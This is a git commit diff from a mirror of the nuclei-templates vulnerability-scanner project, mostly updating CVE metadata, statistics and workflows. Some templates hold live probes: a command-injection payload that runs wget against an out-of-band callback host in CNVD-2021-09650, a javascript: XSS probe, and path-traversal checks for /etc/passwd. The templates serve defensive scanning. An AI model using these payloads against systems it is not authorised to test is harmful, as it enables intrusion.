daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/DhiyaneshGeek/nuclei-templates into pr/3761

patch-1
sandeep 2022-02-27 21:30:55 +05:30
parent 44e07ea18e ad01679036
commit bd50655a13
87 changed files with 2410 additions and 1639 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.github/workflows/cve-annotate.yml vendored
View File

@ -35,6 +35,7 @@ jobs:
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git pull
git add cves
git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a

3
.github/workflows/template-db-indexer.yml vendored
View File

@ -26,5 +26,4 @@ jobs:
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
run: |
generate-index -mode templates
generate-index -mode changelog
generate-index -mode templates

183
.new-additions
View File

@ -1,169 +1,14 @@
cves/2009/CVE-2009-5020.yaml
cves/2012/CVE-2012-4547.yaml
cves/2013/CVE-2013-7091.yaml
cves/2016/CVE-2016-10940.yaml
cves/2016/CVE-2016-3978.yaml
cves/2018/CVE-2018-1000226.yaml
cves/2018/CVE-2018-18925.yaml
cves/2018/CVE-2018-7602.yaml
cves/2019/CVE-2019-1010290.yaml
cves/2019/CVE-2019-10758.yaml
cves/2019/CVE-2019-13396.yaml
cves/2019/CVE-2019-3911.yaml
cves/2019/CVE-2019-3912.yaml
cves/2020/CVE-2020-12447.yaml
cves/2020/CVE-2020-18268.yaml
cves/2020/CVE-2020-24391.yaml
cves/2020/CVE-2020-25864.yaml
cves/2020/CVE-2020-35749.yaml
cves/2020/CVE-2020-36365.yaml
cves/2021/CVE-2021-20150.yaml
cves/2021/CVE-2021-20158.yaml
cves/2021/CVE-2021-20792.yaml
cves/2021/CVE-2021-21973.yaml
cves/2021/CVE-2021-24300.yaml
cves/2021/CVE-2021-24488.yaml
cves/2021/CVE-2021-24510.yaml
cves/2021/CVE-2021-24750.yaml
cves/2021/CVE-2021-24838.yaml
cves/2021/CVE-2021-24926.yaml
cves/2021/CVE-2021-24947.yaml
cves/2021/CVE-2021-24991.yaml
cves/2021/CVE-2021-25008.yaml
cves/2021/CVE-2021-25028.yaml
cves/2021/CVE-2021-25052.yaml
cves/2021/CVE-2021-25063.yaml
cves/2021/CVE-2021-25074.yaml
cves/2021/CVE-2021-25864.yaml
cves/2021/CVE-2021-26247.yaml
cves/2021/CVE-2021-32682.yaml
cves/2021/CVE-2021-32853.yaml
cves/2021/CVE-2021-3293.yaml
cves/2021/CVE-2021-34640.yaml
cves/2021/CVE-2021-34643.yaml
cves/2021/CVE-2021-39322.yaml
cves/2021/CVE-2021-39350.yaml
cves/2021/CVE-2021-39433.yaml
cves/2021/CVE-2021-40323.yaml
cves/2021/CVE-2021-43062.yaml
cves/2021/CVE-2021-43810.yaml
cves/2021/CVE-2021-45380.yaml
cves/2021/CVE-2021-46005.yaml
cves/2022/CVE-2022-0149.yaml
cves/2022/CVE-2022-0218.yaml
cves/2022/CVE-2022-0281.yaml
cves/2022/CVE-2022-0378.yaml
cves/2022/CVE-2022-0432.yaml
cves/2022/CVE-2022-0653.yaml
cves/2022/CVE-2022-23178.yaml
cves/2022/CVE-2022-23808.yaml
cves/2022/CVE-2022-23944.yaml
cves/2022/CVE-2022-24112.yaml
cves/2022/CVE-2022-25323.yaml
default-logins/cobbler/cobbler-default-login.yaml
default-logins/gophish/gophish-default-login.yaml
default-logins/huawei/huawei-HG532e-default-router-login.yaml
default-logins/jboss/jmx-default-login.yaml
default-logins/mofi/mofi4500-default-login.yaml
default-logins/netsus/netsus-default-login.yaml
default-logins/versa/versa-default-login.yaml
default-logins/xerox/xerox7-default-login.yaml
exposed-panels/alfresco-detect.yaml
exposed-panels/atvise-login.yaml
exposed-panels/bigbluebutton-login.yaml
exposed-panels/cisco/cisco-ucs-kvm-login.yaml
exposed-panels/cobbler-webgui.yaml
exposed-panels/code42-panel.yaml
exposed-panels/concrete5/concrete5-install.yaml
exposed-panels/concrete5/concrete5-panel.yaml
exposed-panels/ecosys-command-center.yaml
exposed-panels/flightpath-panel.yaml
exposed-panels/gophish-login.yaml
exposed-panels/hashicorp-consul-agent.yaml
exposed-panels/hashicorp-consul-webgui.yaml
exposed-panels/jamf-panel.yaml
exposed-panels/netdata-dashboard-detected.yaml
exposed-panels/netsus-server-login.yaml
exposed-panels/openbmcs-detect.yaml
exposed-panels/otobo-panel.yaml
exposed-panels/projectsend-login.yaml
exposed-panels/pypicloud-panel.yaml
exposed-panels/qualcomm-voip-router.yaml
exposed-panels/seeddms-panel.yaml
exposed-panels/strapi-documentation.yaml
exposed-panels/submitty-login.yaml
exposed-panels/teltonika-login.yaml
exposed-panels/terraform-enterprise-panel.yaml
exposed-panels/threatq-login.yaml
exposed-panels/trendnet/trendnet-tew827dru-login.yaml
exposed-panels/typo3-login.yaml
exposed-panels/unauth-xproxy-dashboard.yaml
exposed-panels/versa-sdwan.yaml
exposed-panels/voipmonitor-panel.yaml
exposed-panels/wallix-accessmanager-panel.yaml
exposed-panels/wazuh-panel.yaml
exposed-panels/webmodule-ee-panel.yaml
exposed-panels/xxljob-panel.yaml
exposed-panels/zblogphp-panel.yaml
misconfiguration/caddy-open-redirect.yaml
misconfiguration/cobbler-exposed-directory.yaml
misconfiguration/misconfigured-concrete5.yaml
misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml
misconfiguration/openbmcs/openbmcs-ssrf.yaml
ssl/deprecated-tls.yaml
takeovers/gitbook-takeover.yaml
takeovers/short-io.yaml
technologies/airtame-device-detect.yaml
technologies/apollo-server-detect.yaml
technologies/appcms-detect.yaml
technologies/cobbler-version.yaml
technologies/erxes-detect.yaml
technologies/gnuboard-detect.yaml
technologies/interactsh-server.yaml
technologies/lexmark-detect.yaml
technologies/metatag-cms.yaml
technologies/projectsend-detect.yaml
technologies/roundcube-webmail-portal.yaml
technologies/smartstore-detect.yaml
technologies/typo3-detect.yaml
technologies/web-suite-detect.yaml
technologies/zerof-webserver-detect.yaml
vulnerabilities/gitlab/gitlab-rce.yaml
vulnerabilities/jamf/jamf-blind-xxe.yaml
vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml
vulnerabilities/joomla/rusty-joomla.yaml
vulnerabilities/laravel/laravel-ignition-xss.yaml
vulnerabilities/other/antsword-backdoor.yaml
vulnerabilities/other/goip-1-lfi.yaml
vulnerabilities/other/java-melody-xss.yaml
vulnerabilities/other/kyocera-m2035dn-lfi.yaml
vulnerabilities/other/otobo-open-redirect.yaml
vulnerabilities/other/pollbot-redirect.yaml
vulnerabilities/other/yishaadmin-lfi.yaml
vulnerabilities/ransomware/deadbolt-ransomware.yaml
vulnerabilities/wordpress/accessibility-helper-xss.yaml
vulnerabilities/wordpress/candidate-application-lfi.yaml
vulnerabilities/wordpress/cherry-lfi.yaml
vulnerabilities/wordpress/churchope-lfi.yaml
vulnerabilities/wordpress/db-backup-lfi.yaml
vulnerabilities/wordpress/easy-social-feed.yaml
vulnerabilities/wordpress/elementorpage-open-redirect.yaml
vulnerabilities/wordpress/elex-woocommerce-xss.yaml
vulnerabilities/wordpress/feedwordpress-xss.yaml
vulnerabilities/wordpress/hb-audio-lfi.yaml
vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml
vulnerabilities/wordpress/mthemeunus-lfi.yaml
vulnerabilities/wordpress/music-store-open-redirect.yaml
vulnerabilities/wordpress/my-chatbot-xss.yaml
vulnerabilities/wordpress/newsletter-open-redirect.yaml
vulnerabilities/wordpress/ninjaform-open-redirect.yaml
vulnerabilities/wordpress/noptin-open-redirect.yaml
vulnerabilities/wordpress/shortcode-lfi.yaml
vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml
vulnerabilities/wordpress/sniplets-lfi.yaml
vulnerabilities/wordpress/sniplets-xss.yaml
vulnerabilities/wordpress/wp-code-snippets-xss.yaml
vulnerabilities/wordpress/wp-spot-premium-lfi.yaml
vulnerabilities/wordpress/wp-whmcs-xss.yaml
workflows/concrete-workflow.yaml
workflows/gophish-workflow.yaml
cnvd/2021/CNVD-2021-09650.yaml
cnvd/2021/CNVD-2021-15824.yaml
cves/2017/CVE-2017-18598.yaml
cves/2019/CVE-2019-9726.yaml
cves/2021/CVE-2021-24762.yaml
cves/2021/CVE-2021-41192.yaml
cves/2022/CVE-2022-21371.yaml
cves/2022/CVE-2022-23134.yaml
exposed-panels/homematic-panel.yaml
exposed-panels/phoronix-pane;.yaml
exposed-panels/raspberrymatic-panel.yaml
exposed-panels/redash-panel.yaml
technologies/empirecms-detect.yaml
technologies/snipeit-panel.yaml

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1012 | daffainfo | 539 | cves | 1018 | info | 1034 | http | 2802 |
| panel | 424 | dhiyaneshdk | 395 | exposed-panels | 425 | high | 764 | file | 57 |
| lfi | 420 | pikpikcu | 300 | vulnerabilities | 406 | medium | 591 | network | 48 |
| xss | 318 | pdteam | 250 | technologies | 214 | critical | 370 | dns | 16 |
| wordpress | 314 | geeknik | 174 | exposures | 199 | low | 173 | | |
| exposure | 274 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
| rce | 260 | 0x_akoko | 105 | workflows | 184 | | | | |
| cve2021 | 241 | gy741 | 104 | token-spray | 146 | | | | |
| tech | 226 | pussycat0x | 101 | default-logins | 75 | | | | |
| wp-plugin | 222 | princechaddha | 97 | takeovers | 66 | | | | |
| cve | 1025 | daffainfo | 539 | cves | 1031 | info | 1042 | http | 2833 |
| panel | 429 | dhiyaneshdk | 405 | exposed-panels | 430 | high | 769 | file | 57 |
| lfi | 422 | pikpikcu | 302 | vulnerabilities | 414 | medium | 606 | network | 48 |
| xss | 329 | pdteam | 253 | technologies | 217 | critical | 374 | dns | 16 |
| wordpress | 324 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
| rce | 262 | 0x_akoko | 107 | workflows | 185 | | | | |
| cve2021 | 245 | gy741 | 106 | token-spray | 146 | | | | |
| wp-plugin | 231 | pussycat0x | 102 | default-logins | 75 | | | | |
| tech | 229 | princechaddha | 99 | takeovers | 67 | | | | |
**221 directories, 3141 files**.
**221 directories, 3173 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

2587
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1012 | daffainfo | 539 | cves | 1018 | info | 1034 | http | 2802 |
| panel | 424 | dhiyaneshdk | 395 | exposed-panels | 425 | high | 764 | file | 57 |
| lfi | 420 | pikpikcu | 300 | vulnerabilities | 406 | medium | 591 | network | 48 |
| xss | 318 | pdteam | 250 | technologies | 214 | critical | 370 | dns | 16 |
| wordpress | 314 | geeknik | 174 | exposures | 199 | low | 173 | | |
| exposure | 274 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
| rce | 260 | 0x_akoko | 105 | workflows | 184 | | | | |
| cve2021 | 241 | gy741 | 104 | token-spray | 146 | | | | |
| tech | 226 | pussycat0x | 101 | default-logins | 75 | | | | |
| wp-plugin | 222 | princechaddha | 97 | takeovers | 66 | | | | |
| cve | 1025 | daffainfo | 539 | cves | 1031 | info | 1042 | http | 2833 |
| panel | 429 | dhiyaneshdk | 405 | exposed-panels | 430 | high | 769 | file | 57 |
| lfi | 422 | pikpikcu | 302 | vulnerabilities | 414 | medium | 606 | network | 48 |
| xss | 329 | pdteam | 253 | technologies | 217 | critical | 374 | dns | 16 |
| wordpress | 324 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
| rce | 262 | 0x_akoko | 107 | workflows | 185 | | | | |
| cve2021 | 245 | gy741 | 106 | token-spray | 146 | | | | |
| wp-plugin | 231 | pussycat0x | 102 | default-logins | 75 | | | | |
| tech | 229 | princechaddha | 99 | takeovers | 67 | | | | |

24
cnvd/2021/CNVD-2021-09650.yaml Normal file
View File

@ -0,0 +1,24 @@
id: CNVD-2021-09650
info:
name: Ruijie EWEB Gateway Platform Command Execution
author: daffainfo
severity: critical
reference: http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
tags: ruijie,cnvd,cnvd2021,rce
requests:
- raw:
- |
POST /guest_auth/guestIsUp.php
Host: {{Hostname}}
mac=1&ip=127.0.0.1|wget {{interactsh-url}}
unsafe: true
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"

28
cnvd/2021/CNVD-2021-15824.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CNVD-2021-15824
info:
name: EmpireCMS DOM Cross Site-Scripting
author: daffainfo
severity: medium
reference:
- https://www.bilibili.com/read/cv10441910
- https://vul.wangan.com/a/CNVD-2021-15824
tags: empirecms,cnvd,cnvd2021,xss,domxss
requests:
- method: GET
path:
- "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'if(Request("url")!=0)'
- 'href=\""+Request("url")+"\"'
condition: and
- type: status
status:
- 200

6
cves/2012/CVE-2012-4940.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2012-4940
info:
name: Axigen Mail Server - 'Filename' Directory Traversal
name: Axigen Mail Server Filename Directory Traversal
author: dhiyaneshDk
severity: high
description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI.
description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.
reference:
- https://www.exploit-db.com/exploits/37996
- https://nvd.nist.gov/vuln/detail/CVE-2012-4940
@ -28,4 +28,4 @@ requests:
- "extensions"
condition: and
# Enhanced by mp on 2022/02/21
# Enhanced by cs on 2022/02/25

8
cves/2013/CVE-2013-3526.yaml
View File

@ -1,12 +1,14 @@
id: CVE-2013-3526
info:
name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS)
name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526
tags: cve,cve2013,wordpress,xss,wp-plugin
description: "Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."
description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."
classification:
cve-id: CVE-2013-3526
requests:
- method: GET
@ -28,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/23

9
cves/2013/CVE-2013-3827.yaml
View File

@ -4,11 +4,14 @@ info:
name: Javafaces LFI
author: Random-Robbie
severity: medium
description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
tags: cve,cve2013,lfi,javafaces,oracle
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
- https://www.exploit-db.com/exploits/38802
- https://www.oracle.com/security-alerts/cpuoct2013.html
classification:
cve-id: CVE-2013-3827
requests:
- method: GET
@ -36,4 +39,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/23

8
cves/2013/CVE-2013-4117.yaml
View File

@ -1,12 +1,14 @@
id: CVE-2013-4117
info:
name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting (XSS)
name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4117
tags: cve,cve2013,wordpress,xss,wp-plugin
classification:
cve-id: CVE-2013-4117
requests:
- method: GET
@ -28,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/23

13
cves/2013/CVE-2013-4625.yaml
View File

@ -1,12 +1,17 @@
id: CVE-2013-4625
info:
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS)
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625
description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
remediation: Upgrade to Duplicator 0.4.5 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-4625
- https://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html
tags: cve,cve2013,wordpress,xss,wp-plugin
classification:
cve-id: CVE-2013-4625
requests:
- method: GET
@ -28,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

10
cves/2013/CVE-2013-5528.yaml
View File

@ -4,9 +4,13 @@ info:
name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
reference: https://www.exploit-db.com/exploits/40887
description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
reference:
- https://www.exploit-db.com/exploits/40887
- https://nvd.nist.gov/vuln/detail/CVE-2014-3120
tags: cve,cve2013,lfi,cisco
classification:
cve-id: CVE-2013-5528
requests:
- method: GET
@ -23,3 +27,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

7
cves/2013/CVE-2013-5979.yaml
View File

@ -4,12 +4,15 @@ info:
name: Xibo 1.2.2/1.4.1 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/26955
- https://nvd.nist.gov/vuln/detail/CVE-2013-5979
- https://www.cvedetails.com/cve/CVE-2013-5979
- https://bugs.launchpad.net/xibo/+bug/1093967
tags: cve,cve2013,lfi
classification:
cve-id: CVE-2013-5979
requests:
- method: GET
@ -26,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

10
cves/2013/CVE-2013-7091.yaml
View File

@ -1,15 +1,17 @@
id: CVE-2013-7091
info:
name: Zimbra Collaboration Server 7.2.2/8.0.2 LFI
name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion
author: rubina119
severity: critical
description: Directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-7091
- https://www.exploit-db.com/exploits/30085
- https://www.exploit-db.com/exploits/30472
tags: cve,cve2013,zimbra,lfi
classification:
cve-id: CVE-2013-7091
requests:
- method: GET
@ -33,4 +35,6 @@ requests:
- type: regex
regex:
- "root=.*:0:0"
- "root=.*:0:0"
# Enhanced by mp on 2022/02/24

5
cves/2013/CVE-2013-7240.yaml
View File

@ -4,10 +4,11 @@ info:
name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
reference:
- https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
- https://wordpress.org/support/topic/security-vulnerability-cve-2013-7240-directory-traversal/
tags: cve,cve2013,wordpress,wp-plugin,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
@ -34,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

9
cves/2014/CVE-2014-10037.yaml
View File

@ -4,11 +4,14 @@ info:
name: DomPHP 0.83 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php.
description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.
reference:
- https://www.exploit-db.com/exploits/30865
- https://www.cvedetails.com/cve/CVE-2014-10037
- https://nvd.nist.gov/vuln/detail/CVE-2014-10037
tags: cve,cve2014,lfi
classification:
cve-id: CVE-2014-10037
requests:
- method: GET
@ -24,4 +27,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/24

4
cves/2014/CVE-2014-2321.yaml
View File

@ -9,6 +9,8 @@ info:
- https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/
severity: high
tags: iot,cve,cve2014,zte
classification:
cve-id: CVE-2014-2321
requests:
- method: GET
@ -27,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/23

11
cves/2014/CVE-2014-2323.yaml
View File

@ -1,9 +1,12 @@
id: CVE-2014-2323
info:
name: Lighttpd 1.4.34 SQL injection and path traversal
description: SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname.
reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
name: Lighttpd 1.4.34 SQL Injection and Path Traversal
description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname).
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-2323
- https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
- http://www.lighttpd.net/2014/3/12/1.4.35/
author: geeknik
severity: critical
tags: cve,cve2014,sqli,lighttpd,injection
@ -24,3 +27,5 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0:"
# Enhanced by mp on 2022/02/24

10
cves/2014/CVE-2014-2383.yaml
View File

@ -4,12 +4,16 @@ info:
name: Arbitrary file read in dompdf < v0.6.0
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/33004
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-2383
- https://www.exploit-db.com/exploits/33004
classification:
cve-id: CVE-2014-2383
tags: cve,cve2014,dompdf,lfi
metadata:
win-payload: "/dompdf.php?input_file=C:/windows/win.ini"
unix-payload: "/dompdf.php?input_file=/etc/passwd"
description: "dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter."
description: "A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter."
requests:
- method: GET
@ -32,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

8
cves/2014/CVE-2014-2908.yaml
View File

@ -4,11 +4,15 @@ info:
name: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
description: A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
remediation: Upgrade to v4.0 or later.
reference:
- https://www.exploit-db.com/exploits/44687
- https://cert-portal.siemens.com/productcert/pdf/ssa-892012.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2014-2908
tags: cve,cve2014,xss,siemens
classification:
cve-id: CVE-2014-2908
requests:
- method: GET
@ -30,3 +34,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/23

13
cves/2014/CVE-2014-2962.yaml
View File

@ -1,12 +1,17 @@
id: CVE-2014-2962
info:
name: Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal
name: Belkin N150 Router 1.00.08/1.00.09 - Path Traversal
author: daffainfo
severity: high
description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
reference: https://www.exploit-db.com/exploits/38488
description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources.
reference:
- https://www.kb.cert.org/vuls/id/774788
- https://nvd.nist.gov/vuln/detail/CVE-2014-2962l
tags: cve,cve2014,lfi,router,firmware,traversal
classification:
cve-id: CVE-2014-2962
requests:
- method: GET
@ -23,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/23

7
cves/2014/CVE-2014-3120.yaml
View File

@ -5,11 +5,14 @@ info:
author: pikpikcu
severity: critical
description: |
The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.
The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.
reference:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
- https://www.elastic.co/blog/logstash-1-4-3-released
- https://nvd.nist.gov/vuln/detail/CVE-2014-3120
tags: cve,cve2014,elastic,rce,elasticsearch
classification:
cve-id: CVE-2014-3120
requests:
- raw:
@ -52,3 +55,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

2
cves/2014/CVE-2014-3206.yaml
View File

@ -33,3 +33,5 @@ requests:
part: interactsh_protocol
words:
- "http"
# Enhanced by mp on 2022/02/24

11
cves/2014/CVE-2014-3704.yaml
View File

@ -1,16 +1,21 @@
id: CVE-2014-3704
info:
